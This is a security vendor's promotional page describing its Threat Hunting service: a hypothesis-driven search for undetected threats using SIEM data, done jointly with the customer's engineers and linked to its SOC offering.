Detecting threats in IT systems

Threat hunting

To put it as simply as possible, Threat Hunting is a proactive threat investigation within the infrastructure of a relevant organisation, intended to identify any threats which security systems have failed to detect. It consists in collecting historical and current data to perform early detection of any signs of malicious behaviour and to limit dwell time, that is, a period of time a threat is active within an organisation. To a large extent, Threat Hunting depends on the analyst’s skills and knowledge regarding recent activity of criminal groups and innovative attack methods, mostly sourced from the Threat Intelligence service we provide.

Threat Hunting is a creative process yet limited by a specified framework:

  1. At its conception lies an idea (a hypothesis) stemming from intelligence (Threat Intelligence) and findings of the analyst, in order to…
  2. …investigate by means of available tools and data…
  3. …used to either disprove or uphold a hypothesis…
  4. …thus providing an opportunity to implement more effective detection and monitoring methods in the Security Information and Event Management (SIEM) system, as well as to formulate new hypotheses for future hunts.

Threat Hunting assumes there is an efficient multi-area security monitoring process in an organisation as it is based on the data collected in SIEM or a similar solution. This is a 100% independent service, however, it is most useful if integrated with the SOC service provided by us, as these two complement each other perfectly.

Cyber Threat Hunting

The Threat Hunting service is a team-based job, performed by the Cyber Arms analysts together with the Customer’s engineers. Our goal is to increase security level in an organisation as well as to transfer know-how in both directions.
This ensures that, once the drill is complete, any further works may be continued on-site by the Customer’s engineers and analysts, providing much better results than any one-off service.